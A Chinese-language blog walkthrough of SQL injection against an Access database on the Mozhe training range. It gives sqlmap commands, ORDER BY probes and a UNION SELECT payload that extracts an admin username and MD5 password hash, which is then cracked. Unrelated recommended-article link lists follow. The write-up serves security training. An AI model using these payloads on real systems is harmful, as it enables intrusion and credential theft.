ACCESS数据库注入解析
前言:在进行注入之前我们需要了解access数据库的特征,access数据库比较特殊:其结构与mysql ,mssql,MongoDB,postgresql,sqlit等数据不通。区别在与access数据库的接口是:表--列--数据 而其他数据库是:数据库--表--列--数据。并且access数据库没有记录所有表名和列名的表,也就意味着我们需要依靠字典进行猜解表名和列名。了解到这里那么我们就可以开始进行实施注入了。
实验背景:我这里使用的是mozhe靶场进行演示(墨者学院_专注于网络安全人才培养)首页> 在线靶场> SQL注入> SQL手工注入漏洞测试(Access数据库)
1.判断页面是否有注入点
打开靶场环境我们看到url是:http://219.153.49.228:44574/new_list.asp?id=1
http://219.153.49.228:44574/new_list.asp?id=1 and 1=1
http://219.153.49.228:44574/new_list.asp?id=1 and 1=2
进行测试,判断出来这个页面存在注入点。
2.判断数据库类型
这里我们可以借助sqlmap工具判断数据库类型
python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1"
通过sqlmap工具判断出数据库版本类型是Access,可能是因为是access的原因没有判断出来具体的列,所以我们需要结合手工的方式进行判断
3.判断列名数量
http://219.153.49.228:44574/new_list.asp?id=1%20order%20by%204#
http://219.153.49.228:44574/new_list.asp?id=1%20order%20by%205#
所以注入点的列名数量为4
4.猜解表名
python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1" –tables
我们可以从猜解的日志中查看到有两张表 admin和news这两张。
5.猜解列名
python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1" -T"admin" –columns
猜解结果:
6.获取账号密码
继续使用手工注入的方式
在浏览器输入:
http://219.153.49.228:44574/new_list.asp?id=-1%20union%20select%201,username,passwd,4%20from%20admin
所以:
username: moke
passwd:7e6ec4fadf84938f
7.MD5解密
md5解密得到:27737201
所以得到:
用户名:moke
密码:27737201
8.总结
首先我们在得到注入点后,一定要先判断数据库类型,再进行注入,可以结合手工和工具的方式一起进行注入,并且我们要了解注入点数据库的特点以及注入数据的类型。
ACCESS数据库注入解析相关推荐
- 网络安全学习--008--SQL注入之Access数据库注入详解
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Access注入漏洞详解 一:注入漏洞分析 站库分类: 1.网站分类: 静态网页: 不依赖数据库 灵活性差,制作.更新.维护麻烦 交互 ...
- WEB渗透SQL注入【3】[access数据库注入](2)
SQL注入的分类很多,不同的人也会将注入分成不同的种类,下面笔者将介绍一下常见的分类. 注意:此文章中标点符号在页面中显示可能会转成中文的,自己测试时候语句中的标点一律使用英文输入法状态下的. 1.判 ...
- Access数据库注入
目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数 ...
- Access数据库注入之偏移注入
文章目录 一.偏移注入使用场景 二.必要的SQL知识补充 (一)admin.*是什么意思? (二)联合查询的字段数问题 (三)access如何查询指定数据? 三.靶场实战 (一)判断是否存在cooki ...
- 【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入
目录 ACCESS注入 雷驰新闻系统v1.0环境搭建: ACCESS数据库注入演示1: 雷驰新闻系统v3.0环境搭建: cookie注入演示2: ACCESS数据库注入用sqlmap怎么做?演示: A ...
- Python解析access数据库(mdb文件或者accdb文件)
在工作中遇到这样一个问题,需要对上百个mdb文件进行数据统计,mdb文件实际上就是access数据库,使用微软的access工具即可打开. 但是我电脑上没有安装access数据库,而且官方的安装包还要 ...
- Access数据库偏移注入
前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额...还是算了吧,没有太多的时间,之后在网上搜索了一些"偏移注入& ...
- 15、Access数据库偏移注入
前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额...还是算了吧,没有太多的时间,之后在网上搜索了一些"偏移注入& ...
- Access数据库——Cookie注入
目录 1.Cookie注入 什么是Cookie? Cookie注入简介 Cookie和注入有什么关系? Cookie的核心 2.如何设置Cookie? 方法一:依靠浏览器进行设置 方法二:抓包直接修改 ...
- Access数据库手工注入
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具. access数据库结构? access数据库是这么个结构 ...
最新文章
- 图文解读助你理解和使用正则表达式
- 通过LDB_PROCESS函数使用逻辑数据库
- 从零点五开始用Unity做半个2D战棋小游戏(八)
- Python 实例方法,类方法和静态方法的区别
- SAP License:ERP概述
- 一句公道话引发的......
- 如何计算机械能的变化量,问:如何计算机械能变化量?
- windows配置pip加速器
- 字符集 (ASCII、GBK、UTF-8、编码方案,解码方案、乱码等问题)
- 如何用程序实现“rescan windows device manager
- 常见的统计图表及其应用
- 从“游击队”到“正规军”:虾神成长史
- neko vm 数据包装翻译
- GPS卫星定位接收器的NMEA协议解析
- Codeforces - Cashback
- SVA——断言属性之序列(sequence与property的用法)
- CNN卷积神经网络 ILSVRC-2012
- BZOJ 2303: [Apio2011]方格染色 [并查集 数学!]
- Docker下/var/lib/docker/overlay2空间清理办法
- 基于JAVA成人自考信息与推荐系统录屏计算机毕业设计源码+系统+lw文档+部署
热门文章
- java下载 安卓版_java教程手机版-java宝典安卓版下载2.0 官方版-西西软件下载
- c语言程序设计题怎么写,C语言程序设计题库1(最新整理)
- 大型网站应用之海量数据和高并发解决方案总结一二
- 对《Java编程思想》读者的一点建议
- 计算机网络:数据通信的主要技术指标
- 高清成主流 十大最受用户关注摄像头
- Java-----exe
- 【读书笔记《Android游戏编程之从零开始》】19.游戏开发基础(游戏音乐与音效)
- 【C语言】简单小游戏项目:《别踩白块儿》
- 小甲鱼零基础入门python课后作业及答案_小甲鱼python视频第四讲(笔记及课后习题答案)...